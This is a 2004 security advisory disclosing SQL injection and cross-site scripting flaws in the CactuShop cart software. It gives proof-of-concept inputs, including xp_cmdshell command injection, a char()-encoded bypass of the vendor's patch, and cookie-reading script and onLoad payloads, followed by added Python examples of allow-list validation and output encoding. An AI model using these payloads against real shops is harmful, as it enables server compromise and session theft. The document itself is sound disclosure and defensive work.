
| Subject: | [Full-Disclosure] CactuSoft CactuShop v5.x shopping cart software multiple security vulnerabilities |
|---|---|
| Date: | Wed, 31 Mar 2004 16:13:56 +0400 |
S-Quadra Advisory #2004-03-31
Topic: CactuSoft CactuShop v5.x shopping cart software multiple security vulnerabilities
Severity: High
Vendor URL: http://www.cactushop.com
Advisory URL: http://www.s-quadra.com/advisories/Adv-20040331.txt
Release date: 31 Mar 2004
1. DESCRIPTION
CactuShop is an ASP application for running an e-commerce web site. It incorporates a database-driven catalogue system, front-end pages for product navigation, back-end pages for updating product details, and robust basket code for remembering product selections as a visitor moves around the web site. The ASP software is designed to run on a Microsoft NT or Windows 2000 server and to use MS Access, MS SQL Server or MySQL as a backend. Please visit http://www.cactushop.com for information about the CactuShop shopping cart.
2. DETAILS
-- Vulnerability 1: SQL Injection vulnerability
An SQL injection vulnerability has been found in the following scripts: 'mailorder.asp' and 'payonline.asp'. The user-supplied input parameter 'strItems' is not filtered before being used in an SQL query, so the query can be modified through malformed input.
Successful exploitation of this vulnerability can enable an attacker to execute commands on the system (via MS SQL Server's xp_cmdshell).
-- Vulnerability 2: Cross-site scripting vulnerability found in the 'largeimage.asp' script
By injecting specially crafted JavaScript code into a URL and tricking a user into visiting it, a remote attacker can steal the user's session ID and gain access to the user's personal data.
-- PoC code
-- Vulnerability 1:
Platform: MS SQL Server as a backend
Posting this data to 'payonline.asp' executes the 'dir c:' command:
strAgain=yes&CD_EmailAddress=dummy@someemailservice.com&CD_Password=&CD_AffiliateID=&CD_CardholderCountry=200&CD_ShippingCountry=200&CD_ShippingPostcode=&strPaymentSystem=email&CP_CouponCode=&numLanguageID=1&numCurrencyID=1&numItemCount=2&strItems=214;+exec+master..xp_cmdshell+'dir+c:'--z165z&strQuantities=6z2z&numShipMethod=1&btnProceed=Proceed
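As an added illustration, not part of the advisory and not CactuShop's own code, the following Python stand-in shows why escaping single quotes (the fix the vendor describes in section 3) does nothing for this parameter: strItems is used in a numeric context, so a stacked statement needs no quote at all. The hardened path validates strItems against an allow-list and binds every id as a query parameter. The products table, the 'z'-delimited id format inferred from the PoC, and SQLite standing in for MS SQL Server are all assumptions made here.

```python
import re
import sqlite3

# Vendor-style mitigation from the 15 Mar 2004 response: double up single quotes.
def escape_single_quotes(value: str) -> str:
    return value.replace("'", "''")

# Constructed stand-in for the vulnerable pattern: the raw parameter is
# concatenated into the statement text (table and column names are assumed).
def vulnerable_query_text(str_items: str) -> str:
    return f"SELECT id, name FROM products WHERE id IN ({str_items})"

def statement_count(sql: str) -> int:
    """Count ';'-separated statements in the text; a safe query has exactly one."""
    return len([s for s in sql.split(";") if s.strip()])

# Allow-list: the PoC suggests strItems is a run of integer ids, each terminated
# by 'z' (e.g. "214z165z"). That format is an assumption taken from the PoC.
ITEMS_RE = re.compile(r"(?:\d+z)+")

def is_valid_items(str_items: str) -> bool:
    return ITEMS_RE.fullmatch(str_items) is not None

def parse_items(str_items: str) -> list:
    """Reject anything that is not a list of integer ids; return the ids."""
    if not is_valid_items(str_items):
        raise ValueError("strItems must be 'z'-delimited integer ids")
    return [int(tok) for tok in str_items.split("z") if tok]

def demo_db() -> sqlite3.Connection:
    """In-memory SQLite catalogue standing in for the MS SQL backend (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(165, "Widget"), (214, "Gadget"), (300, "Gizmo")])
    return conn

def fetch_products(conn: sqlite3.Connection, str_items: str) -> list:
    """Hardened path: validate first, then bind each id as a parameter."""
    ids = parse_items(str_items)
    placeholders = ",".join("?" * len(ids))
    sql = f"SELECT id, name FROM products WHERE id IN ({placeholders}) ORDER BY id"
    return conn.execute(sql, ids).fetchall()

# Constructed payload with the same shape as the advisory's PoC: a stacked
# statement after the id and no single quote anywhere, so escaping cannot touch it.
INJECTED = "214;select 1--z165z"

if __name__ == "__main__":
    print(escape_single_quotes(INJECTED) == INJECTED)        # True: escaping is a no-op here
    print(statement_count(vulnerable_query_text(INJECTED)))  # 2: a second statement got in
    print(is_valid_items(INJECTED), is_valid_items("214z165z"))  # False True
    print(fetch_products(demo_db(), "214z165z"))             # [(165, 'Widget'), (214, 'Gadget')]
```

The point of the allow-list is that it describes what the parameter may contain rather than trying to enumerate what it must not; combined with parameter binding, the database never sees strItems as statement text at all.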
-- Vulnerability 2:
http://[target]/popuplargeimage.asp?strImageTag=<script>alert(document.cookie)</script>
3. FIX INFORMATION
11 Mar 2004: S-Quadra alerted CactuSoft (the CactuShop developers) to these issues.
15 Mar 2004: CactuSoft response:
"1) SQL Injection
On payonline.asp and all mailorder pages the strItems field is now parsed for single-quote (') characters before being used with database queries. Single quotes are escaped (replaced with 2 single-quotes) to ensure SQL Injection won't work.
2) Javascript Injection
The strImageTag field is parsed for HTML tag characters (< and >), which are removed from the string. This should ensure against <script> and any other HTML tags.
This can be tested on the demo of the new CactuShop v5.1 (http://www.cactushop.com/cs51/)."
16 Mar 2004: S-Quadra tested the patched version of CactuShop. The vulnerabilities were not fixed. New PoC code:
For SQL Injection:
strItems=214;declare%20@a%20sysname%20set%20@a%20=%20char(100)%2bchar(105)%2bchar(114)%2bchar(32)%2bchar(99)%2bchar(58)%20exec%20master..xp_cmdshell%20@a;--z165z
For XSS:
http://[target]/popuplargeimage.asp?strImageTag=<img+src="uploads/images_products_large/113.gif"%20onLoad="alert(document.cookie)">
16 Mar 2004: S-Quadra alerted CactuSoft about the new PoC code.
26 Mar 2004: S-Quadra alerted CactuSoft about the new PoC code.
Since 16 Mar 2004 CactuSoft has dropped communication with us; no further response has been received, and therefore no new fix information is available.
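As an added illustration, not part of the advisory and not CactuShop's own code, the following Python stand-in contrasts the vendor's fix for strImageTag (stripping '<' and '>') with output encoding. A two-character denylist only helps when the value lands in body text; once the same value is echoed inside an attribute, an event handler needs no angle bracket at all, while encoding the output neutralises the value in both places. The two templates and the attribute-shaped value are constructed; the two tag-based values are the advisory's own PoC strings, URL-decoded. The audit uses Python's html.parser as a rough stand-in for what a browser would see.

```python
import html
from html.parser import HTMLParser

# Vendor-style fix from the 15 Mar 2004 response: drop '<' and '>' (a denylist).
def strip_angle_brackets(value: str) -> str:
    return value.replace("<", "").replace(">", "")

# Output encoding: every character with HTML meaning, quotes included, becomes an entity.
def encode_for_html(value: str) -> str:
    return html.escape(value, quote=True)

def no_sanitizer(value: str) -> str:
    return value

# Constructed templates standing in for a page that echoes strImageTag; the
# real popuplargeimage.asp source is not part of the advisory.
def render_in_text(value: str, sanitize) -> str:
    return f'<div class="popup">{sanitize(value)}</div>'

def render_in_attribute(value: str, sanitize) -> str:
    return f'<img src="{sanitize(value)}">'

class _MarkupAudit(HTMLParser):
    """Collect the tag names and attribute names an HTML parser sees in the output."""
    def __init__(self):
        super().__init__()
        self.tags = []
        self.attr_names = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attr_names.extend(name for name, _ in attrs)

def has_script_or_handler(rendered: str) -> bool:
    """True if the rendered HTML carries a <script> tag or any on* event-handler attribute."""
    audit = _MarkupAudit()
    audit.feed(rendered)
    audit.close()
    return "script" in audit.tags or any(n.startswith("on") for n in audit.attr_names)

# The advisory's two PoC values (URL-decoded) and one constructed attribute-context value.
SCRIPT_PAYLOAD = "<script>alert(document.cookie)</script>"
IMG_PAYLOAD = '<img src="uploads/images_products_large/113.gif" onLoad="alert(document.cookie)">'
ATTR_PAYLOAD = 'uploads/x.gif" onload="alert(1)'   # constructed: no angle bracket needed

def outcome(value: str) -> dict:
    """For one input, does each sanitizer/context combination still yield live markup?"""
    return {
        "raw_text": has_script_or_handler(render_in_text(value, no_sanitizer)),
        "strip_text": has_script_or_handler(render_in_text(value, strip_angle_brackets)),
        "strip_attr": has_script_or_handler(render_in_attribute(value, strip_angle_brackets)),
        "encode_text": has_script_or_handler(render_in_text(value, encode_for_html)),
        "encode_attr": has_script_or_handler(render_in_attribute(value, encode_for_html)),
    }

if __name__ == "__main__":
    for name, value in [("script", SCRIPT_PAYLOAD), ("img", IMG_PAYLOAD), ("attr", ATTR_PAYLOAD)]:
        print(name, outcome(value))
```

Running it shows the stripped script and img payloads rendered inert in the text context, exactly what the vendor claimed, but the attribute-shaped value survives stripping untouched and becomes a live onload handler when echoed into src="...", whereas the encoded output never yields a handler or a script tag in either context.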
4. CREDITS
Nick Gudov, chief security researcher at S-Quadra <cipher@s-quadra.com>, discovered the above-mentioned vulnerabilities.
5. ABOUT
S-Quadra dedicates its substantial knowledge and resources to managing clients' IT security risks. S-Quadra's audits and protection services for software and networks implement pioneering methods and ground-breaking technologies.